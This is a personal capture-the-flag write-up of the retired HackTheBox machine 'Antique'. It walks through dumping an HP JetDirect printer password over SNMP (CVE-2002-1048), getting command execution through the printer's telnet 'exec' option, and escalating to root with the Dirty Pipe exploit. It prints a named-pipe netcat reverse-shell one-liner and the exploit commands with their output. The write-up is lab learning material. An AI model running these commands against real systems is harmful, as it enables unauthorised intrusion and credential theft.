HackTheBox: Antique


Finally got VIP. This is an old retired easy box, rated roughly the same difficulty as [[Busqueda]]

Im going to use 'Guided Mode' if I get stuck, because I want to finish this in about 4 hours.


Only a single open port: telnet on 23.

Enumerating telnet

When I connect to the service via telnet I get a header "HP JetDirect", and then a password prompt. Let me look up what the default password for HP JetDirect is.

It doesnt look like there is a default password, but I stumbled across an exploit specific to JetDirect passwords without actually looking for it: (https://www.exploit-db.com/exploits/22319)

Dumping printer credentials using CVE-2002-1048

Despite knowing the exploit, this took me almost half an hour to do because I have no experience with SNMP protocol or its utilities. That was a pain in the nuts.

Basically, in this exploit, you query the printer (if 'query' is the right word) for a specific object identifier (OID) string. For whatever reason, one particular OID string will respond with hex-encoded credentials on vulnerable printers. I guess some printers store the password as an object?

Either way, I finally got it working. Here's what I did:

$ snmpget -v2c -cprivate -mALL .

iso. = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 
33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135

Then, to flex my new sed skills, I converted this to a printf-friendly format as follows. First, I copy+pasted everything after "BITS:" to a text file. I named this file hexdump. Then:

$ cat hexdump
50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135

$ sed 's/ /\\x/g' hexdump

<notice that the leading '50' does not have the '\x'. Need to manually add that in the next step>

$ printf "\x50\x40\x73\x73\x77\x30\x72\x64\x40\x31\x32\x33\x21\x21\x31\x32\x33\x1\x3\x9\x17\x18\x19\x22\x23\x25\x26\x27\x30\x31\x33\x34\x35\x37\x38\x39\x42\x43\x49\x50\x51\x54\x57\x58\x61\x65\x74\x75\x79\x82\x83\x86\x90\x91\x94\x95\x98\x103\x106\x111\x114\x115\x119\x122\x123\x126\x130\x131\x134\x135"
P@ssw0rd@123!!123       ▒"#%&'01345789BCIPQTWXaetuy��������3614592360145

So to recap the above, I used sed to replace all spaces in the hexdump file with \x, because that's how the printf function accepts hex input.

Then I ran printf with this string (and manually added the first \x) to convert the hex to ASCII.

And there we have it; the printer password appears to be ==P@ssw0rd@123!!123==.

Searching for RCE

This is a weird one... I don't really know what to do inside a printer. I looked on searchsploit for "jetdirect", and one that popped up was an RCE path traversal vulnerability that had a metasploit module. Ill give this a shot.

$ msfconsole

msf6 > use exploit/linux/misc/hp_jetdirect_path_traversal

msf6 exploit(linux/misc/hp_jetdirect_path_traversal) > options

Module options (exploit/linux/misc/hp_jetdirect_path_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMMUNITY  public           yes       SNMP Community String
   RETRIES    1                yes       SNMP Retries
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      9100             yes       The target port (TCP)
   SNMPPORT   161              yes       The SNMP port
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TIMEOUT    1                yes       SNMP Timeout
   URIPATH                     no        The URI to use for this exploit (default is random)
   VERSION    1                yes       SNMP Version <1/2c>

   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST          yes       The local host or network interface to listen on. This must be an address on the local machine or to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.

Payload options (cmd/unix/bind_busybox_telnetd):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   LOGIN_CMD  /bin/sh          yes       Command telnetd will execute on connect
   LPORT      4444             yes       The listen port
   RHOST                       no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Unix (In-Memory)

msf6 exploit(linux/misc/hp_jetdirect_path_traversal) > set RHOSTS
msf6 exploit(linux/misc/hp_jetdirect_path_traversal) > set COMMUNITY private
COMMUNITY => private
msf6 exploit(linux/misc/hp_jetdirect_path_traversal) > set SNMPPORT 23
msf6 exploit(linux/misc/hp_jetdirect_path_traversal) > set RPORT 23

For whatever fucked-up reason, this metasploit module apparently doesnt account for the fact that a password might be set up. So I cant use this, at least not without some modification. I could also check github for other PoCs for this CVE. But if that fails, I can just read the metasploit module code and do it myself by hand.

Or maybe I can disable the password inside the printer? Let's try that first.

The closest thing I saw was to whitelist an IP address using allow: <ip>

Using the printer's shell

Like an idiot, I missed this option when I was viewing the help menu on the printer's telnet interface. But you can run system commands using exec.

Please type "?" for HELP
> ? 

To Change/Configure Parameters Enter:
Parameter-name: value <Carriage Return>

Parameter-name Type of value
ip: IP-address in dotted notation
subnet-mask: address in dotted notation (enter 0 for default)
default-gw: address in dotted notation (enter 0 for default)
syslog-svr: address in dotted notation (enter 0 for default)
idle-timeout: seconds in integers
set-cmnty-name: alpha-numeric string (32 chars max)
host-name: alpha-numeric string (upper case only, 32 chars max)
dhcp-config: 0 to disable, 1 to enable
allow: <ip> [mask] (0 to clear, list to display, 10 max)

addrawport: <TCP port num> (<TCP port num> 3000-9000)
deleterawport: <TCP port num>
listrawport: (No parameter required)

exec: execute system commands (exec id)
exit: quit from telnet session

There it is, down at the bottom.

> exec ls

> exec whoami

Damn, that's pretty cool that these have actual linux shells. I suppose that renders the metasploit thing redundant, since I already have RCE through this.

Let me spawn a busybox-style reverse shell:

> exec rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f

On my local machine:

$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 59416
/bin/sh: 0: can't access tty; job control turned off

$ whoami

Upgrading the reverse shell: Doing it the right way

I never really try the tty upgrade stuff on reverse shells, because the zsh shell kali uses doesnt seem to like the tty commands.

But Im going to give it another shot. Ill switch to bash and try it that way

$ bash

$nc -nlvp 1234
connect to [] from (UNKNOWN) [] 59418
/bin/sh: 0: can't access tty; job control turned off
$ export TERM=xterm

$ python3 -c 'import pty; pty.spawn("/bin/bash")'

<background the revshell with CTRL-Z>

kali@kali: stty raw -echo
kali@kali: fg <you wont actually see the prompt here>

lp@anitque:~$ reset <this corrects the format>

Beautiful. That's the first time Ive done that successfully. Now I have tab-completion on the revshell

Enumerating from inside the printer shell

The first thing I checked was for sudo permissions, which didn't work because I don't know this user's password.

The second check was for interesting SUIDS, but there were no useful ones.

The third check was for the kernel version, which was 5.13.0. Now THAT's useful; this version is vulnerable to the Dirty Pipe exploit.

Priv esc: the 'Dirty Pipe' exploit

This couldnt have been easier, to be honest.

I didn't even need to download the code. On my local machine I ran

$ searchsploit -x linux/local/50808.c >> dirtypipe.c

to dump the source code stored in searchsploit to a c file. I transferred this to the victim by hosting a python server and using wget.

On the victim I compiled it and ran it, attempting to hijack the pkexec SUID binary:

lp@antique:~$ gcc dirtypipe.c -o dirtypipe

lp@antique:~$ which pkexec

lp@antique:~$ ./dirtypipe /usr/bin/pkexec
[+] hijacking suid binary..
[+] dropping suid shell..
[+] restoring suid binary..
[+] popping root shell.. (dont forget to clean up /tmp/sh ;))

# whoami